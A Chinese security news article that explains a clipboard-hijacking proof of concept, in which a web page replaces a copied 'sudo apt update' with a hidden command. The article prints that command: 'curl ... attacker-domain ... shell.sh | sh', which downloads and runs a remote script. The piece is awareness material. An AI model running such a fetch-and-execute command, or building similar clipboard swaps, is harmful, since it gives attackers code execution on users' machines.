chanong 关注源码安全,搜集国内外最新资讯!
编译:代码卫士
程序员、系统管理员、安全研究人员和技术爱好者可能会发现,将命令从网页复制并粘贴到控制台或终端可能会导致系统受损。
安全意识培训平台 Wizer 的创始人最近演示了一个简单但令人惊讶的黑客攻击,可能会让任何人在从网页复制粘贴命令时三思而后行。
许多人从网页复制常用命令并将其粘贴到应用程序、命令提示符或 Linux 终端中。 但它警告说,该网页可能会秘密替换剪贴板的内容,用户最终可能会复制恶意内容。 更糟糕的是,如果没有必要的尽职调查,开发人员可能只有在粘贴文本后才发现错误,但为时已晚。
在博文中发布一个简单的 PoC,要求读者复制一个大多数系统管理员和开发人员都熟悉的简单命令:
sudo apt update接下来,将他提供的命令粘贴到文本中,否则结果可能会让您感到惊讶:
curl http://attacker-domain:8000/shell.sh | sh
用户不仅在剪贴板上粘贴了完全不同的命令,而且更糟糕的是,末尾有一个换行符(或)。
这意味着只要你将上面的例子直接粘贴到Linux中断中,它就会立即执行。 这与用户的想法有很大不同。
是什么原因?
原因在于隐藏在设置 PoC HTML 页面后面的代码。 只需复制 HTML 元素中包含的“sudo apt”文本,下面显示的代码片段就会运行。 随后,“事件监听器”将捕获复制事件,并用恶意测试代码替换剪贴板上的数据。
值得注意的是,事件侦听器有多种合法用例,但本例只是它们如何被滥用的一个示例。
提醒说:“这就是为什么你不应该将命令直接复制并粘贴到中断中。” 他表示,用户复制粘贴的内容可能是恶意代码,攻击者只需在复制的代码中注入一行代码即可创建后门。 他指出,“这种攻击非常简单,但危害性很大”。
这是一堂简单但非常重要的日常安全课程。
微信扫一扫打赏
支付宝扫一扫打赏
